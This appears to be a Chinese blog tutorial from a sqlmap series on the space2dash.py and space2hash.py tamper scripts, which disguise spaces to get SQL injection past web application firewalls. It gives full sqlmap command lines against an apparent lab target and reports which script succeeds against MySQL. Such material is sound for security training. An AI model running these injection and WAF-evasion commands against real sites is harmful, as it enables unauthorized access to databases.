0
点赞
收藏
分享

微信扫一扫

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py

38. space2dash.py脚本

使用破折号注释符"--" 再就是加一个随机字符串和一个换行符(%0A) 用来替换空格,一般适用于MSSQL和SQLite

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2dash.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py_sql

发现并不能注入成功,目标是mysql数据库而这个绕过方法是只适用于mssql和sqlite,我们看看burp抓包情况

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py_mysql数据库_02

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py_随机字符串_03

可以看到有随机字符串和换行符及破折号,效果明显 

===================================================================================================================================================

39. space2hash.py脚本

使用注释符"#" (%23) 再加上随机字符串和一个换行符(%0A) 用来替换空格 适用于mysql数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2hash.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py_sql_04

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py_随机字符串_05

测试结果是可以注入,根据此参数的说明是只适用于mysql数据库,而我的目标靶机刚好是mysql数据库,所以可以注入,我们看看burpsuite的抓包情况

sqlmap从入门到精通-第七章-7-18 绕过WAF脚本-space2dash.py&space2hash.py_mysql数据库_06

 可以看到效果明显,加了随机字符串和注释符#

 

迷茫的人生,需要不断努力,才能看清远方模糊的志向!

举报

相关推荐

0 条评论